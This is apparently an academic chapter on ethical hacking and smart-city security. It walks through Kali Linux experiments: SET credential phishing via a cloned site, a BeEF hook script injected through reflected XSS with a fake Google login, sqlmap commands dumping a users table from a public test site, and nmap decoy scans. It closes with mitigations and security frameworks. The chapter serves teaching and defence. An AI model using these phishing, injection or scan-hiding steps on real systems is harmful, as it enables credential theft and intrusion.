1 Introduction

Globally, the metropolitan population is growing, and forward-looking urban planning programs leverage the potential of the Internet of Things (IoT) to create better, more effective, and more productive solutions. However, investment in data security in smart cities lags drastically behind, creating future vulnerabilities in the IoT ecosystem. Smart cities form a highly dynamic and interdependent network of computers, networks, platforms, and users. The vertical networks that vendors and governments must protect include smart electricity, utilities, water and pollution, parking and automotive, industrial and engineering systems, building automation, e-government and telemedicine, surveillance, and public protection.

IoT provides effective and efficient ways to work with patients and has become a major development area for health care. Given the growing number of COVID-19 patients, IoT now plays a dominant role in the healthcare sector, with numerous applications such as telemedicine, connected imaging, inpatient monitoring, drug control, relevant protection, integrated nursing, connected emergency services, and many others. The latest outbreak of COVID-19 has driven IoT health network vendors to rapidly develop strategies to meet the growing need for high-quality virus protection services. Technologies such as telemedicine offer electronic services for patients, and interactive medicine and medical care are expected to take root during this time.

Cybercrime is rising rapidly as Internet use grows. It is necessary to be aware of current and recent threats, system vulnerabilities, and the security measures that protect networks and systems from these attacks. Because of the growth of the Internet, data protection and network security are essential areas of concern. To protect networks, systems, and applications from malicious hacking activities, IT scientists and researchers are creating new frameworks and technologies. Once attackers have hacked into a website or device, they have plenty of options to manipulate the information they gather, damage the network, and disable application services. It is therefore very critical that the correct network and device security policies, interventions and vulnerabilities be carefully monitored and enforced. Many companies, such as Google, banks and Microsoft, run ethical hacking challenges in which their systems are examined for vulnerabilities and the ethical hacker receives large prize money [1]. Besides, numerous network consultancies evaluate the facilities and networks of organizations and propose the best approaches and suggestions for improving their safety [2]. The Internet has become a necessity for the public in today’s era due to its widespread use in sectors such as education, finance, social media applications, government services and many more. Every activity an Internet user completes raises the risk of personal data being abused by hackers, or of the user being targeted in the form of identity theft.

Researchers point out that every system differs from others in its functionality, requirements, and complexity, which demands careful deployment of security measures and mitigation planning. Internet security knowledge has become essential nowadays because digital data is popular and systems are always connected to the Internet. It is the responsibility of individuals and companies to take proper security measures against information breaches and to implement appropriate policies and controls. One of the critical methods to inspect vulnerabilities and enhance network security is to perform penetration testing continuously. We are connected around the world through the Internet. Rapid Internet development and use have had a tremendous effect on culture, allowing people to accomplish their everyday activities and to communicate across the globe. Yet external attacks over the Internet continue to increase and damage society. Hacking is an operation in which a person uses a vulnerability of a system for self-benefit. It refers to obtaining access to a computer, a system, or a network to get the information stored on it by cracking or using other data collection techniques. It can be performed by finding system vulnerabilities or through sabotage [3].

IoT and smart city networks must ensure that such incidents do not arise and that consumer data is protected. Critical data such as financial statements, customer accounts and confidential data are stored on platforms and systems. Three criteria, confidentiality, integrity and availability, must be considered when designing a secure network infrastructure. Several mechanisms are currently used for screening processes, networks, and software security. Kali Linux is one of the best-known free tools. In this article, we used Kali to conduct numerous experiments to inspect vulnerabilities in devices, networks, and applications. In Kali we used the SETOOLKIT program for phishing, the Browser Exploitation Framework, and SQL Map to target a victim’s machine through SQL injection. We also conducted a penetration test with NMAP to perform a port evaluation of a victim unit. These techniques and experiments are used to inform users about how these attacks succeed, how effective they are, and how they are mitigated. Finally, we have made several suggestions to assist consumers and organizations in improving their networks and enforcing proactive strategies to discourage unsafe practices.

2 Literature Review

We have reviewed various papers in which researchers mainly focused on a particular attack or topic. However, there is a lack of good hacking papers that explain different attack methodologies within one paper, the nature of the attacks, and the procedure for a fresh ethical hacking user. In this research, we describe a step-by-step experimental approach for beginners to understand ethical hacking terminology along with the processing of specific types of attacks.

In the following paper [4], the author demonstrates cross-site scripting attacks on banking websites and proposes an appropriate solution for their mitigation. Online services are a common way of delivering digital banking. Vulnerabilities in both browsers and servers are discovered and reported at an alarming rate. Online apps often use JavaScript, which is embedded in web pages to support dynamic client-side behaviour. This script code is executed in the user’s web browser. A sandboxing mechanism is used to safeguard the user’s environment against malicious JavaScript code by restricting a program to only the resources associated with its originating location. Such protection measures are, sadly, ineffective if a user can be served malicious JavaScript code from a trusted location. This gives a malicious script complete access to all the resources that belong to the trustworthy site, e.g., authentication tokens and cookies. These attacks are known as cross-site scripting (XSS) attacks. XSS attacks are usually easy to execute but difficult to detect and avoid. One explanation is that HTML encoding schemes give attackers many possibilities to bypass server-side input filters and insert malicious scripts into trustworthy sites. Developing a client-side solution is not easy because JavaScript code is difficult to classify as malicious. In this paper, the author proposed Noxes, a web proxy-based tool, as a client-side solution to prevent cross-site scripting attacks. Noxes serves as a web proxy and uses both manual and automated rules to block cross-site scripting attempts. Noxes effectively defends the user against information leakage while requiring minimal user interaction and customization. However, the proposed solution was limited to a prototype, and it was only developed using .NET. The approach has some limitations, requires a lot of manual configuration, and lacks SSL support.

In this paper [5], the author gives an overview of various kinds of structured query language injections, cross-site scripting attacks, vulnerabilities, and prevention techniques. However, only a content analysis and a survey were presented in this research paper, without any experimental study.

In the following paper, the authors showed some penetration testing experiments using the Metasploit framework to assess system vulnerabilities. The paper included an elementary experiment of Metasploit testing and was only valid for SCADA systems [6].

The following paper discusses ethical hacking and issues related to the stability of computer systems [1]. When we talk about protection in an information network, we mean the three core characteristics of a framework: confidentiality, integrity, and availability. There are several methods of finding current protection vulnerabilities and carrying out safety reviews. One is Kali Linux, with its built-in versatile resources that are particularly suited to conducting specific types of assaults. In this paper, the author provides an outline of several options available in Kali OS to exploit client- and server-side services. They mainly discussed the benefits of using Kali, which offers a variety of hacking tools and free applications to assess system vulnerabilities.

3 Internet of Things (IoT)

In the past two decades, IoT networks have become renowned and used for their usability and efficiency in many industries such as smart cities, agriculture, pharmacy, manufacturing and so forth. In IoT or smart networks, transceivers, sensors, microcontrollers, and energy sources are integrated. Other technologies such as WSN, RF identification, cloud computing, middleware systems and end-user applications are implemented in IoT [3].

IoT-related networks are usually a mixture of several computers linked worldwide. IoT technology links smart devices, gateways, data networks and apps via cloud storage. In many scenarios these intelligent devices are deployed and operated at different distances and managed by a centralized management framework. The entire IoT architecture comprises different elements, blocks, modules, and protocols. IoT’s modules consist of a sensing unit, a communication unit, a computing unit and an Internet unit alongside related protocols and services. The IoT model consists of six blocks: the Identification Block, Sensing Block, Communication Block, Computational Block, Service Block and Semantics Block.

IoT protocols can be categorized into two specific forms of data access control: IoT network protocols and IoT application protocols. Examples of such protocols are the Constrained Application Protocol (CoAP), Message Queue Telemetry Transport (MQTT), Zigbee, LoRaWAN, etc. [7].

By 2020, the smart city market is predicted to reach $400 billion. The metropolitan population is rising alarmingly rapidly. One report indicates that 65% of the world population will be residing in cities by 2040. To me, that looks like anarchy. We need cybersecurity to maintain wellness in intelligent communities [8].

While the details that users exchange in a smart city infrastructure might not appear important to an individual user, that knowledge is a gift to a hacker seeking to exploit the related network. In smart cities, there is wide potential for instability. Hackers may, for example, take possession of the critical-infrastructure AIs that control water or energy, placing them in malicious actors’ hands.

As such, the first move towards secure intelligent cities consists of finding the weaknesses and potential entry points for hackers in every system. It may be a single smart meter in a broad power grid scheme. Such systems are therefore plagued by computer criminals eager to create mayhem at the least chance.

Ethical hacking of the Internet of Things (IoT) involves knowing how these systems operate and how IoT and smart system networks can be secured while these devices are online. This chapter lets users consider the various communication models used by IoT devices and the most basic architectures and protocols. It will cover the numerous risks that IoT devices generate if not handled properly and how to secure the networks. Finally, you can learn the numerous methods that can be used against you and some countermeasures to better secure your assets.

4 Ethical Hacking

In today’s busy world, we are increasingly connected only through the Internet [9]. During difficult times like COVID-19, the Web has held the world together and kept it working continuously. Rapid Internet growth has produced positive results while also having a dangerous darker side of criminal hackers. Hacking is an operation in which a person uses a vulnerability of a system for self-benefit. Hacking refers to obtaining access to a computer to get the information stored on it using password-cracking software or other data collection techniques. It is done either to point out the loopholes or to cause deliberate sabotage to the system.

As companies and individuals utilize many online facilities and rely on the Internet, hackers find more ways and opportunities to use their power to access confidential data through web applications and online systems [9]. Therefore, the need to protect online applications and systems from hackers increases heavily, along with the demand for people who can push back against the illegal attacks that occur on users’ systems. Thus, ethical hackers have succeeded in solving these real problems. Ethical hacking is concerned with identifying and rectifying the vulnerabilities and weaknesses of a system. Hence, it can be described as the hacking process without malicious intention or harm to any network. Ethical hacking can also be defined as a security assessment, a sort of training, or a security check of an information technology environment. This process shows the risks that an information technology environment faces and the measures that can be taken to reduce those risks. Furthermore, it is also known as Penetration Hacking, Red Teaming, or Intrusion Testing [10].

An ethical hacker is a computer expert who works on a security system and looks for the vulnerabilities that a malicious hacker might exploit [11]. They use their imagination and expertise to make a company’s online world a foolproof and safe place for both owners and customers. Such ‘Cyber Cops’ protect cyberspace from cybercrime [12]. Ethical hacking is needed to protect the system from the damage that hackers cause. The principal reason behind an ethical hacking study is to evaluate the protection of the target device and report back to the owner. Ethical hacking is an ongoing process, since a single penetration test only captures the security issues present at that time, and new ones keep evolving. There are many techniques used to hack information, such as information gathering, vulnerability scanning, exploitation and test analysis. Other techniques include phishing, where the attacker attempts to obtain sensitive information such as credit card numbers and passwords from individuals or a specific person. In Denial of Service (DoS) attacks, a hacker targets a system and ensures that the network is inaccessible to its intended users for a limited period or a longer duration. Malware refers to all types of viruses, Trojans, worms, etc., that are injected by hackers to damage the targeted systems, to collect important information and to access vulnerabilities in the targeted system. The hacking phases also include Reconnaissance (gathering information), Scanning (getting IP addresses and user information from the target system), Owning the system (gaining access and entry into the network), Zombie system (a hijacked, owned system) and Destroying evidence of the attack [13].

Ethical hacking requires automated tools; without them, the hacking process is slow and time-consuming. NMAP is a well-known automated tool used in the hacking environment for port scanning and checking the accessibility of services. Nessus is another hacking tool available for home users. Metasploit includes a database with a list of available exploits, is easy to use, and is one of the best penetration testing software packages. NetStumbler can also be used for wardriving and is useful on Windows OS. Wireshark is also used to capture packets and inspect network traffic [14, 15]. An advantage of ethical hacking is that these forms of tests can provide credible evidence of the threat of disclosure at the actual device, application, and network level by proof of access. This helps companies to proactively enhance overall network security and develop mature security knowledge through a combination of procedures, processes, technological infrastructure, network requirements, and monitoring and audit methods. The findings give a good picture of the operation and response mechanisms of the detection processes. These “tests” may also detect vulnerabilities that many network security managers are not aware of, since they may not be as familiar with hacking methods as hackers are. These results may lead to improved communication between system managers and technicians and the establishment of training standards [16]. Unfortunately, the test is usually limited to operating systems, security configurations, and bugs. These tests are also carried out by a reputable third party, which needs to be considered because we might need to provide internal information to speed up the process and save time.

5 Breach Testing

The security threats to businesses, organizations and agencies that deal with confidential data are more than obvious. In certain cases, such companies have little to no oversight over them. Uncontrolled risks can increase the number of security attacks, which can turn into huge financial losses. Protective mechanisms such as prevention, detection, and quick response can be used to guarantee protection in every network. Prevention is the method of trying to prevent intruders from accessing the system’s resources. Detection takes place when the attacker has been successful or is in the process of gaining access to the device. Response refers to a mechanism that occurs after the event and attempts to respond to the failure of the first two mechanisms; it operates by attempting to stop and avoid potential damage or access to networks or systems. However, the assessment of the security state is an ongoing and important process for considering the risks involved [17].

One of the established ways of determining the security status and rising security risks is called the penetration test (Pentest). A Pentest is a managed attempt to infiltrate a device or network so that its weaknesses are found. It is an authorized simulated cyberattack on a network that is performed to assess system security. A Pentest uses techniques similar to those hackers use in a normal attack. This process allows appropriate measures to be taken to eliminate the vulnerabilities before unauthorized persons can exploit them [18]. These tests are performed to scrutinize most of the vulnerabilities, including the potential for unauthorized parties to gain access to the features and data of the program, as well as strengths, to complete a full risk assessment. Penetration tests are used to detect exploitable vulnerabilities in the organization’s systems and help developers to create secure and reliable systems. Businesses and individuals need to protect their information from external and internal attackers and continuously track the security issues that arise. The data produced by the test are considered private and confidential, as they show all the device’s problems and how they can be exploited. A Pentest can be carried out by targeting the device in the way an external attacker would and finding out what can be gained. The attack may combine several vulnerabilities into an attack chain (a multi-step attack) to achieve the target. It is also called a risk assessment, which can be used to track network security [19]. The penetration test process can be broken up into tasks such as the collection of information from the target system, the review of the target system to determine the facilities and protocols that are available, the identification of existing target systems and applications, and the identification of exploits and vulnerabilities in known applications and systems. The Pentest application method can be a way of determining a system’s security level. A stronger Pentest leads to a more successful assessment. The application of a Pentest can be based on certain parameters: the level of knowledge about the company before the execution of the Pentest, the depth of the test (whether it attempts to identify the main vulnerabilities or to exploit all possible attacks), the test scope, and the techniques and methodologies used in the Pentest.

6 Vulnerability Assessment

A vulnerability is a flaw or defect in any system or security infrastructure module. If there are no vulnerabilities, we can call such a system a vulnerability-free system or a secure environment. To assess the vulnerability of any system, we need to find the weaknesses in the application, the system, or the infrastructure. Any weakness we find in a system might be an entry point for an attacker or intruder to infect the system or harm the entire environment. The attacker may gain additional benefits such as acquiring illegal or unauthorized access to a user’s account. Vulnerabilities pose the highest risk to any computing environment [12, 20]. Unfortunately, we have underestimated the requirements of vulnerability assessment and penetration testing, which are key to cyber defence mechanisms.

7 Financial Losses and Cybercrime Cases

Nowadays cybercrimes are increasing rapidly throughout the world, causing substantial financial losses to businesses and individuals. Recent surveys and cybersecurity reports indicate that hacked and compromised data cases are mainly increasing among familiar workplace sources such as mobile users, IoT networks, social media, and other services.

According to the Kaspersky survey reported in its security bulletin, 11,544,340 possible threats were observed in the last quarter of 2019 in Malaysia [21]. From 2018 to August 2019, cyber scams led to losses of RM410.6 million, with 8,489 incidents reported in Malaysia [22]. In 2017, Microsoft, in collaboration with Frost & Sullivan, carried out research revealing that Malaysia could face a possible economic loss of US$12.2 billion (RM49.15 billion) due to cybersecurity incidents, which is more than 4% of Malaysia’s total GDP of US$296 billion [23]. National Cybersecurity Oman also reveals that in 2018, Oman’s cyberspace saw over 430,000 attempts and over 71,000 network attacks [24]. Another survey, by Cybersecurity Ventures, predicts that cybercrime damage could cost the world $6 trillion per annum by 2021, up from $3 trillion in 2015. Even in the USA, companies like Equifax and Yahoo, and the U.S. military, have repeatedly been seen fighting cyber-attacks. A single malware attack in 2018 cost companies in the USA more than $2.6 million [25]. Recent security research shows that most companies and individuals are vulnerable to data loss because of insecure data, inadequate cybersecurity policies and a lack of knowledge. Therefore, organisations and individuals must incorporate cybersecurity awareness, protection, and risk mitigation to combat malicious activities.

Dubsmash is video dubbing software in which users can record themselves dubbing any audio or video clip from a movie, music, shows, and the latest trending videos. It was hacked in December 2018. The hacker stole 161.5 million user account details with their credentials, including usernames, hashed passwords, and email IDs. Dubsmash officially announced this hacking incident in February 2019. The hackers posted the data for sale publicly on the dark web in 2019. As a corrective measure, Dubsmash urged all its users to change their passwords with immediate effect [26].

Capital One is a pioneer in the banking sector and a financial corporation that deals with banking, credit cards, loans, and savings accounts for its customers. It is based in the United States of America. In March 2019, a data theft from Capital One’s servers exposed the sensitive data of 106 million customers. Capital One announced that hackers had gained access to the confidential information of consumers, applicants, and businesses who had applied for credit cards from 2005 to early 2019. Additionally, 80,000 bank accounts linked to customers were also exposed. Capital One later patched the exploit and worked hard with federal law enforcement on the data breach that had happened [27].

AMCA is a medical billing company and holder of medical test reports based in the USA. In 2019, AMCA faced the worst data breach that had ever happened to it, losing the data of 7.7 million customers. AMCA officially declared that it had lost details such as customers’ names, dates of birth, contact numbers, addresses, medical history, medical services, health care providers and balance data. Insurance IDs, medical test reports, and social security numbers were not part of the stolen data. Since AMCA had contracts with many other companies, the companies linked with it were also likely affected by the data breach [28].

8 Ethical Hacking and Breach Testing Using Kali

Information security assessment can usually be described in four categories: risk assessment, compliance monitoring, standard internal/external penetration testing and application evaluation. Various techniques and tools are used to identify and inspect existing security vulnerabilities in systems, applications, and networks [29].

BeEF is an abbreviation of “The Browser Exploitation Framework”, a security tool used for penetration testing by system administrators. It helps to create additional attack vectors when assessing the security posture of a target. It is an exploitation tool that focuses on the client-side application, specifically the web browser. It provides practical client-side attack vectors for penetration testers. It evades network security appliances and host-based antivirus applications by targeting the vulnerabilities found in common browsers. It allows an attacker to inject JavaScript code into vulnerable HTML code using an attack such as XSS. BeEF hooks browsers using a script for further attacks.

SQL Map is an open-source penetration testing tool that detects and automatically exploits SQL injection flaws to retrieve information from the database server. It has a strong detection engine, many useful features for the ultimate penetration test, and a wide range of switches, from database fingerprinting and data fetching from the database to accessing the underlying file system and executing commands on the operating system via an out-of-band connection. SQL Map can be used for various purposes, such as scanning web apps for SQL injection vulnerabilities, exploiting SQL injection vulnerabilities, extracting databases and database user details entirely, bypassing a Web Application Firewall (WAF) by using tamper scripts, and taking over the underlying operating system.

In this chapter, we have performed several experiments and explained in detail how to perform ethical hacking using the free tools in Kali. The attacks included in the toolkit are designed to target an individual or organization, concentrating on the delivery of a penetration assessment. They aim to simulate and augment social engineering assaults; the SET tool is known as a standard tool used for penetration testing. Moreover, this chapter also provides prevention methods to reduce the possibility of attacks and strengthen individual and organizational security infrastructure.

9 Social Engineering Toolkit (SET) Discussion

The Social Engineering Toolkit is an open-source Python-based suite of customized tools written by David Kennedy to conduct penetration tests; it runs on Kali. In these experiments, we attacked an organization website that was running on a local server. We bypassed the security barriers and cloned the real website. Later, we sent the cloned web link to our victim user as a social engineering exercise and retrieved the user’s information on our Kali OS. We used the SET tool to perform a phishing activity on a victim website by cloning it (website spoofing) and obtaining login user details such as “Username” and “Password”. Phishing is a type of Internet fraud in which an attacker tricks the victim into providing sensitive information, such as username, password, credit card number, etc. We used Kali Linux OS running on a Virtual Machine (VM) and performed the following experiments. The SETOOLKIT application and a mobile phone were used in this experiment. First, we selected a victim website without security barriers and cloned it using SET. We chose the 1st option, “Social Engineering Attacks”, to perform the social engineering activity and clone the victim website. Besides, SET provides website templates for some popular websites, such as Google, Facebook, Yahoo, and Twitter. If a user wants to clone one of these popular websites, he can choose the 1st option, Web Templates. After that, we entered the IP address of our Kali VM. Once the cloning process has been completed, the user can send his IP address to the victim users. When the victim clicks on the given IP address, he is directed to the cloned website at that IP address. To test and verify this process, we sent the cloned website IP address to a victim user’s device and opened the cloned website from the victim’s mobile phone. The cloned website looks precisely like the original website on the victim device, as shown in Fig. 1.

Fig. 1 Opened cloned website on victim device

When the victim typed his Username and Password to log in on the fake website, all the information reached us and was retrieved on Kali. The SET tool harvested the data entered by the victim, such as Username and Password, as shown in Fig. 2.

Fig. 2 Retrieving user details on Kali

10 Browser Exploitation Framework (BeEF) Discussion

The BeEF application is built into Kali and is used for cross-site scripting types of attacks. When a system is infected with this type of malware, it becomes slower, sends the user’s confidential information to the attacker, including CPU performance and memory details, and frequently reboots without the user’s consent. In this experiment, we demonstrated the use of BeEF to perform cross-site scripting (XSS). The BeEF server can be accessed in any browser on the localhost. It runs a web server on port 3000. BeEF usually starts a web server, and an authentication page opens automatically in the default browser. The BeEF authentication page can also be accessed through the following URL: http://localhost:3000/ui/authentication. The default username and password for BeEF authentication are “BeEF”. After logging in to BeEF, the “Hooked Browsers” option shows the hooked status of the victims. BeEF hooks a JavaScript file that is used to hook and exploit target web browsers and acts as Command and Control (C&C) between the target and the attacker. Once a targeted web browser is hooked, the attacker can execute commands on the target browser to gather information about the target. First, we need to find out our machine’s IP address and then write the hooking script into the web page that we want the targeted browser to run. An example of a hooking script is: <script src="http://127.0.0.1:3000/hook.js"></script>. On our target machine, we created a web page that allows the user to input text, and we hosted the website using the XAMPP server. The user’s input is echoed back when the user presses the submit button. We ran the website, entered the hooking script in the text area and pressed the submit button. The hooking script is echoed back into the page, and once it has been echoed, the target browser is hooked. By clicking on the targeted machine’s IP address, we can observe the details of its browser in Fig. 3.
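As an added illustration (not code from the paper or from BeEF), the following Python simulates the echo page described above in its vulnerable form, which reflects the submitted text unescaped so that the hooking script tag is parsed as markup, beside a hardened form that HTML-escapes the input and adds a Content-Security-Policy header. The hook URL is the one quoted in the text; the page markup, the Response type and the function names are assumptions.

```python
import html
from dataclasses import dataclass, field

# Constructed hooking payload of the shape quoted in the text; 127.0.0.1:3000 is
# where BeEF serves hook.js in the experiment.
HOOK_PAYLOAD = '<script src="http://127.0.0.1:3000/hook.js"></script>'

# Assumed markup for the XAMPP demo page: a text area whose content is echoed back.
PAGE_TEMPLATE = (
    "<!doctype html><html><body>\n"
    '<form method="post"><textarea name="text"></textarea>'
    '<input type="submit" value="Submit"></form>\n'
    "<p>You entered: {echoed}</p>\n"
    "</body></html>"
)


def render_vulnerable(user_input: str) -> str:
    """Reflects the submitted text straight into the page, as the demo page does.
    A submitted <script> tag therefore becomes live markup: reflected XSS."""
    return PAGE_TEMPLATE.format(echoed=user_input)


def render_hardened(user_input: str) -> str:
    """Escapes < > & " ' before reflecting, so the input is displayed as text
    and the browser never parses it as a script element."""
    return PAGE_TEMPLATE.format(echoed=html.escape(user_input, quote=True))


@dataclass
class Response:
    body: str
    headers: dict = field(default_factory=dict)


def hardened_response(user_input: str) -> Response:
    """Defence in depth: output encoding plus a Content-Security-Policy that only
    allows scripts from the page's own origin, so a hook.js served from another
    origin would be refused even if an encoding bug let a tag through."""
    return Response(
        body=render_hardened(user_input),
        headers={"Content-Security-Policy": "default-src 'self'; script-src 'self'"},
    )


def contains_live_script(body: str) -> bool:
    """Crude check used here only to show the difference: is there an unescaped
    external <script src=...> element left in the rendered page?"""
    return "<script src=" in body.lower()
```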

Fig. 3 Targeted machine browser info—hooked

Then, we executed some commands on the target browser under the Commands tab to retrieve information about the victim's browser and user. In this example, we ran the 'Google Phishing' command from the Social Engineering folder to turn the web page in the target browser into a Google phishing page. We changed the XSS host URL to http://192.168.3.102:3000/demos/basic.html, as shown in Fig. 4, so as to capture the user input from the target browser.

Fig. 4 XSS host URL

When the command was executed, the web page in the target browser changed to a Google webpage asking for a username and password, as shown in Fig. 5.

Fig. 5 Google webpage on user device

When the victim entered his username and password in the target browser and pressed the "Sign In" button, we obtained his username and password in BeEF by clicking the module result in the Module Results History, as shown in Fig. 6.

Fig. 6 Retrieving user details

11 SQL Analysis Discussion

SQL injection is a code injection technique in which an attacker submits malicious SQL queries to access the database behind a web application. To find a vulnerable website, one can use Google Dork strings such as inurl:item_id= and inurl:index.php?id=. In these experiments, we use http://testphp.vulnweb.com. When we search on the site, the URL changes to "http://testphp.vulnweb.com/search.php?test=query". To test whether a URL is vulnerable to SQL injection, we can append a single quote to the parameter; if the page then throws a SQL error, the website is vulnerable to SQL injection. To start sqlmap, we opened the Kali terminal and typed the following command, as shown in Fig. 7.

Fig. 7 Starting of SQL map

sqlmap -u http://testphp.vulnweb.com/search.php?test=query

With this command, sqlmap sends different SQL injection payloads to the input parameter and checks the responses. It also identifies the victim website's database name and version. From the result, the back-end DBMS is identified as MySQL, and the web application technology used by the victim website is Nginx with PHP 5.3.10, as shown in Fig. 8.

Fig. 8 DBMS and MYSQL version

To get a list of the available databases, we use the command below (Fig. 9):

Fig. 9 Extract database info

sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --dbs

From the result shown in Fig. 9, we get the names of the two available databases, "acuart" and "information_schema". Next, we list the tables in the database named "acuart" with the command below:

sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --tables -D acuart

From the result shown in Fig. 10, we get the list of tables in the acuart database.

Fig. 10 List of extracted tables from database acuart

Now we retrieve the columns of the users table in the "acuart" database. To get the columns of a particular table, we use the command below:

sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --columns -D acuart -T users

From the result shown in Fig. 11, we get the list of columns of the users table in the acuart database.

Fig. 11 List of extracted table columns

Finally, we dump all the data from the users table in the "acuart" database with the command below:

sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --dump -D acuart -T users

Information such as the username and password values stored in the users table of the "acuart" database is extracted, as shown in Fig. 12.

Fig. 12 Extracted user details from the table

12 NMAP

Nmap is an open-source network mapping application for platforms such as Linux, Windows and macOS. It supports activities such as ping sweeps, port scanning, IP address spoofing, OS detection and other network intelligence gathering. It is also a common tool for hackers to perform reconnaissance, one of the crucial preparatory steps of an attack, in which information about the victim's operating system, ports, services and applications is collected before any attack is executed. In these experiments we demonstrate some features that penetration testers use during this preparatory step: scanning a specific port range, scanning a subnet, spoofing and decoy scans, evading firewalls, gathering version information and writing scan results to a file.

In the first step, we performed port scanning to find the open ports on the target machine, using Nmap's basic TCP connect scan syntax "nmap -sT 192.168.0.104". Figure 13 shows the result: all open TCP ports and the default service for each port are displayed in the console.

Fig. 13 TCP ports information of victim computer

To find out which OS is running on the target machine, we perform OS detection in Nmap with the command "nmap 192.168.0.104 -O", where "-O" enables OS detection, as shown in Fig. 14.

Fig. 14 Open ports information of victim computer

Every packet the hacker sends to the victim device carries its source IP address. Nmap provides a way for hackers or penetration testers to hide their identity so that the network administrator cannot easily determine the source of the attack: the decoy scan. Nmap buries our IP address among several decoy IP addresses, so that a security admin monitoring network packets sees many addresses apparently scanning the target. The -D option does this; the decoy addresses are given as a comma-separated list. For example:

  • nmap -sS 192.168.0.104 -D 192.168.139.127,192.168.139.129,192.168.139.130

This command places a few decoy IP addresses in our scan so that the target cannot determine the exact source of the scanning device. However, knowing the default service for a port might not be enough for penetration testers or hackers, since many different services can run on the same port. If the attack focuses on one service on a specific port, it is crucial to have more detail about that service. For example, if we attack a specific web server such as Apache but the target is actually running Microsoft IIS, the attack will not succeed. We therefore need to confirm that the service running on the port is the one our attack targets. To find out detailed information about the services running on the open ports, we used Nmap's version detection option -sV, for example nmap -sV 192.168.0.100, as shown in Fig. 15.

Fig. 15 Services information of victim computer

13 Policy-Based Solutions: Information Security Models and Frameworks

Cybersecurity refers to protecting Internet-connected devices, including their hardware, software and information, from illegal or unauthorized access. Protection against cybercrime is therefore very important and requires a solid cybersecurity infrastructure to protect organizational networks and systems. Many kinds of cyber-attack may be carried out, including malware, phishing, Trojan horses, worms, Denial-of-Service (DoS), unauthorized access (such as intellectual property theft and breaches of confidentiality) and system attacks. There are several reasons to develop appropriate standards and policies and to adopt suitable frameworks to protect an organization's information infrastructure and assets: they help organizations improve business process efficiency, reliability and revenue growth. To make an organization's information security infrastructure reliable and secure, three major aspects need to be considered and planned properly [30].

  i. Law and Regulation: Each organization must follow data protection laws and standards in order to act against illegal activities, whether internal or external, and should clearly define and implement them for its survival.

  ii. Business Objectives: The main objective of any organization's business operation is financial benefit. The information security plan must protect these objectives and help the organization run its operations smoothly and safely.

  iii. Security Threats: The organization must understand the security threats it can expect, know its limitations, and have the ability to tackle them in order to achieve its business objectives.

The following model gives a detailed overview of the Security Governance, Risk and Compliance (GRC) model [30] (Fig. 16).

Fig. 16 Security governance, risk and compliance (GRC) model

A Security Policy Framework (SPF) offers comprehensive protection to an organization's network and mandates protective security outcomes across all departments. Every country is therefore now emphasizing cybersecurity, allocating larger budgets to its cybersecurity departments and building guidelines. Every organization should implement and maintain standard security measures to protect its information, services, applications and information security assets, so as to meet its SPF and national cybersecurity standards obligations. Various security frameworks are available, such as NIST, CIS, ISO/IEC 27001, the PDCA cycle, IASME Governance, COBIT, COSO and others. Each organization should choose an appropriate SPF depending on its business and communication requirements among departments, customers and stakeholders. These cybersecurity frameworks were proposed and are used to enhance organizations' information security and to standardize security requirements worldwide.

NIST (National Institute of Standards and Technology) introduced its well-known security framework in the USA in 2013. The latest amendment, made in April 2018, is named Framework Version 1.1 [31]. The framework was established in recognition of companies' need to be shielded from cybercrime. NIST offers policy guidance that strengthens the capacity of businesses to prevent, detect and respond to cyber-attacks; it reduces cybersecurity risk, allows stakeholders to defend against potential security threats and supports business processes in an efficient way. According to NIST, 50% of USA companies were expected to adopt the NIST framework to protect their assets and information security infrastructure by 2020 [32]. Many businesses worldwide use NIST because of these advantages. Since the NIST CSF focuses on technical regulation, it is best suited to technology-oriented businesses (Fig. 17).

Fig. 17 NIST cyber security framework

The NIST framework has five phases: Identify, Protect, Detect, Respond and Recover [32]:

  i. Identify: This phase focuses on developing the organization's understanding of how to manage cybersecurity risk to its networks, systems, applications, services, assets and information.

  ii. Protect: This phase allows organizations to develop and implement appropriate security barriers to ensure protection against cyber-attacks and to keep their essential services running in any situation.

  iii. Detect: This phase allows organizations to implement appropriate security solutions that can detect the occurrence of a cyber-attack.

  iv. Respond: The organization's security infrastructure should be able to act fast when an emergency event occurs and should have the ability to contain the losses.

  v. Recover: The organization should be able to recover and resume its primary functions as soon as possible after any hacking or malicious event occurs.

Therefore, it is best to choose the SPF that suits the organization's business operating model. It can also be beneficial to combine two models to get the maximum benefit.

14 Attack Mitigation Solutions

There are several ways to prevent phishing attacks [33]. First, protect your mailbox from spam by using email filtering features; however, this filtering is not 100% accurate. Next, set the browser to block fraudulent websites: the browser keeps a list of known fraudulent websites, including fake sites, so that when a user tries to load one, the site is blocked and an alert is shown. It is good practice to change passwords regularly and never reuse the same password across accounts. Websites should also include a CAPTCHA system for better security. Likewise, organizations can protect their websites from some malicious activities; for instance, a company's website should not be clonable, and companies should take measures against cloning. Organizations must also train their employees to be aware of such attacks and limit employees' access when using the organization's network and computers. Moreover, users must remember that a bank or other financial institution never sends an email asking for a password and username; on receiving such an email, it is better to double-check with the bank or financial institution. It is also essential to hover over every URL received in an email before clicking it. Usually, a reliable and secure website or link will have an SSL certificate and begin with "https". Ways to prevent social engineering [34]:

  • Do not trust any unverified source or link.

  • Always check the URL before providing your details.

  • Do not download unknown files.

  • Know the user and research the source.

Ways to prevent XSS [35]:

  • Allow only whitelisted user inputs and perform input/output encoding.

  • Use CAPTCHA, Re-authentication, and unique request ID.

  • Ensure the presence of the authenticated user during these sensitive operations.

  i. Escaping: To prevent XSS vulnerabilities in their web applications, companies should control and regularly monitor user inputs and traffic activity, monitor website data and traffic to control attacks and illegal access to their sites, and build secure systems and policies to protect user information and the reliability of their systems and networks. Escaping user input prevents key characters received by a web page from being interpreted in a malicious way. For example, a web page should not render user data containing characters such as < and > unescaped, because they can harm the web application. Companies should prevent users from adding code to a page by escaping all HTML, URL and JavaScript entities. If the page needs to allow users to add markup, it should specify and control the permitted HTML entities or use a replacement format for raw HTML, such as Markdown, which allows all HTML to remain escaped.

  ii. Sanitizing: Another way to prevent cross-site scripting attacks is to sanitize user input, which ensures that received data cannot harm users or the database by scrubbing potentially harmful markup from the data and converting unacceptable input into an acceptable format.

